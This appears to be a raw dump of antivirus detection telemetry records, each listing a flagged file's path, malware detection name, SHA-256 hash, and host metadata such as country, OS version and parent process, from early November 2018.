  Row(detection=Row(filename='windowsformsapp2.exe', filepath='C:\\comandsoft\\WindowsFormsApp2\\WindowsFormsApp2\\obj\\Release\\WindowsFormsApp2.exe', filesize=1152000, name='HEUR/AGEN.1003473.#M1.#R1'), hash='ab714e78737ba53201a68a9f9ded01d000461639d6734181706052fdf5eba21a', metadata=Row(cmdline='@\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\tmpf3a29e56e2c54723893adada0bfddf58.rsp\\\\\\"', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.6.1 Tools\\al.exe', parentsize=229512, timestamp='2018-11-02T05:44:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105734-7c5ec055', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105734-7C5EC055', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='a0b9a85795a590e74f4bb5f961ec00c0c07978d47ef69ce10efc676ab22331fe', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T08:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='injection.vir', filepath='C:\\Users\\X\\AppData\\Local\\injection.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='7f62bf2df9e8e5f63ccc4c492e0cc60d672f12a5ed28f576a3b5a47c189f10e3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611360, timestamp='2018-11-02T01:36:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274050003.pif', filepath='F:\\scan-peta-wb-sp2010\\3274050\\3274050003\\3274050003.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:05:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='block 3.exe', filepath='F:\\ASANTE PRESBYTERY_LMFDP_Handouts\\BLOCK 3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whudprcqcf.bat', filepath='H:\\whudprcqcf.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='a15f43e03a607fafd71d9138639cec715c3d4b21dd96e541261fff308c24f7b0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T08:10:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8abb9d1535b61747bbf37018e21ec4f1ec564914211266e82c648c352e934bf5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8ABB9D1535B61747BBF37018E21EC4F1EC564914211266E82C648C352E934BF5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8abb9d1535b61747bbf37018e21ec4f1ec564914211266e82c648c352e934bf5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:53:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{AB1AF8A9-4061-43C6-8DD9-5B737E2EC0A7}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='e76f410aa935de472affe89696e8e793a0dffa20e70cf1b945fb9b851694e667', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='@%@~%~%%%~@%%~~%.1', filepath='K:\\\xa0\\@%@~%~%%%~@%%~~%.1', filesize=6672000, name='WORM/Taranis.2597.#M1.#R1'), hash='f4abb99fc0ffc4c2201bfcf5567786891631d6ae0962ab03fc7a799291e5596b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (3).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hopinst.exe', filepath='\\\\?\\C:\\Program Files (x86)\\interhpx_00000000\\HopInst.exe', filesize=192000, name='Adware/Elex.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:20:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\iuivjmdpqfg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064620-3cc0b7fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064620-3CC0B7FD', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_25a00107.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_25a00107.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:00:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iocf3597241-1dcf-dc4d-9613-0bbc4a99d370', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP19.0.0\\Temp\\iocF3597241-1DCF-DC4D-9613-0BBC4A99D370', filesize=512000, name='TR/Crypt.XPACK.Gen.#M300.#R2423'), hash='a597d8219234df0cc417f91ee27e07eb9567570ab2f06ea3e1f5f730134a112a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T09:52:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\jqhjjf1jorl\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b1669dd8ab9595df192af2e61a14416ab08b67250febbfc35cf35a356c2a49e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B1669DD8AB9595DF192AF2E61A14416AB08B67250FEBBFC35CF35A356C2A49E2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b1669dd8ab9595df192af2e61a14416ab08b67250febbfc35cf35a356c2a49e2', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:41:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135553-d6342287', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6aeacdd\\AVSCAN-20181104-133443-34024088\\AVSCAN-20181104-135553-D6342287', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c228', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c228', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:29:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T05:37:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204627-7f39adcc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204627-7F39ADCC', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='46e1046ae1802769ec9bd7be9f75c4c50853f005', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\46e1046ae1802769ec9bd7be9f75c4c50853f005', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_17b8dbe2.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_17b8dbe2.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='bfc42fbb92f0aadad7f76bdbee2a1605fb9ec584c65fdbecce239d5bac26b2a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290e69', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290e69', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:42:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='c:\\users\\X\\downloads\\filezilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T15:55:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162040-2943283a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151404-D70ED41C\\AVSCAN-20181104-162040-2943283A', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150623-76293fa8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7cc8a9dc\\AVSCAN-20181104-140503-F38806A4\\AVSCAN-20181104-150623-76293FA8', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='fefefd774d1ba5efc46a0f4273ef0265b4f8460f63f7bffd10b366b368de38eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:06:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.15063.0_none_e6376d51f3e7328e\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:49:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Users\\X\\Documents\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T19:28:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:04:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsxE262.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T11:37:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lust_and_power.exe', filepath='D:\\моя\\Новая папка (10)\\Lust and Power\\[RUS] Lust_and_Power-1.2.b-pc\\Lust_and_Power.exe', filesize=128000, name='TR/Crypt.ZPACK.Gen.#M300.#R2504'), hash='f944b967950e2a63ae409719695c20f479ac847d801faab7805e0b867f7a6781', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:12:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='invoice_cam.doc', filepath='invoice_cam.doc', filesize=192000, name='HEUR/AGEN.1004823.#M15.#R1004823'), hash='f92e23a4882a395b3b1a1c8cd8bee63422876451f4fb0df3c6efb3829d8c5524', metadata=Row(cmdline=None, country='PA', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:35:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:07:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='malaysia 2013a.exe', filepath='I:\\Local Disk\\maljogja2\\Malaysia 2013A.exe', filesize=1536000, name='W32/Sality.AW.#M1.#R1'), hash='fb589478efc68e5629aecfba8ec434a4e37e02bd9e9fd99c1cb27b640938dc41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-01T08:41:13Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chgport.exe', filepath='d:\\windows\\system32\\chgport.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='586b16d5edea913eced410b8f2df423906a176f66d21f02104aae7bab328a5f2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate - copia.exe', filepath='C:\\Users\\X\\Documents\\flashUpdate - copia.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T02:27:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='workpanel.exe', filepath='\\?\\G:\\PLC\\上環機31\\上環機-5\\軟式操作盤\\WorkPanel.exe', filesize=2560000, name='W32/Jadtre.K.#M1.#R1'), hash='684b3f5551cc5c6b068ba8a80ba1ae91d44eded5a9235896827165a08727d023', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe489_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe489 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T16:02:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130951-6d4c5cf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-130951-6D4C5CF7', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170607-9afeb86c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_89974494\\AVSCAN-20181102-170436-91354B67\\AVSCAN-20181102-170607-9AFEB86C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='config.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\platform\\config\\config.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='4b52764c2c6f57a583c769ba7b2f7a83649c38fecbe5f80e0b24fc2514c897e4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:09:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163338-0e6b9122', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_731bb7c6\\AVSCAN-20181102-163329-0CD40CF0\\AVSCAN-20181102-163338-0E6B9122', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:33:39Z'), dt=datetime.date(2018, 11, 2)),
